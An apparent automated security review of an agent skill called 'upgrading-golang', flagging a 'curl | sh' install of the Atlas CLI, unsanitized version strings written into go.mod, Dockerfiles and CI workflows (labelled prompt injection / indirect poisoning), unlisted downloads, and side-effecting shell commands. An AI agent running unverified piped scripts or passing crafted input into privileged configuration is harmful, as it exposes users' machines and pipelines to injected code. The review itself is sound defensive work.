The Agent Skills Directory

REMOTE_CODE_EXECUTION (CRITICAL): The skill implements a 'curl | sh' pattern to download and execute scripts directly from the internet.
Evidence: Step 7c in SKILL.md uses curl -sSf https://atlasgo.sh | ... sh -s -- -y to install the Atlas CLI.
Source Status: The domain atlasgo.sh is not a trusted source according to the [TRUST-SCOPE-RULE].
Risk: This allows the external site to execute arbitrary code on the runner's machine with no integrity verification.
PROMPT_INJECTION / INDIRECT POISONING (HIGH): The skill lacks sanitization for user-provided version strings which are then used to modify high-privilege configuration files.
Ingestion points: User-provided Go version (Step 1) and Atlas version (Step 1).
Boundary markers: None. Input is directly interpolated into patterns.
Capability inventory: Write access to go.mod, multiple Dockerfiles, and GitHub Action workflows (lint.yml, test.yml, release.yaml, codeql.yml); execution of make, go, and docker.
Sanitization: None. The skill assumes the user provides a valid version string.
Risk: A malicious version string (e.g., containing newlines or shell metacharacters) could inject malicious steps into CI/CD workflows or backdoors into Dockerfiles.
EXTERNAL_DOWNLOADS (MEDIUM): The skill downloads Docker images and binaries from non-whitelisted third-party registries.
Evidence: docker pull arigaio/atlas:X.XX.X and curl https://atlasgo.sh.
Context: While arigaio is the official Atlas maintainer, it is not within the predefined trusted organization list, making these unverifiable dependencies in this security context.
COMMAND_EXECUTION (MEDIUM): The skill executes multiple shell commands with side effects on the local filesystem.
Evidence: make test, make lint, go mod tidy, wire ./..., and buf format -w in Steps 8 and 9.
Risk: Because these commands run after the skill has modified project files based on user input, they could trigger malicious logic if the modifications included injection payloads.

upgrading-golang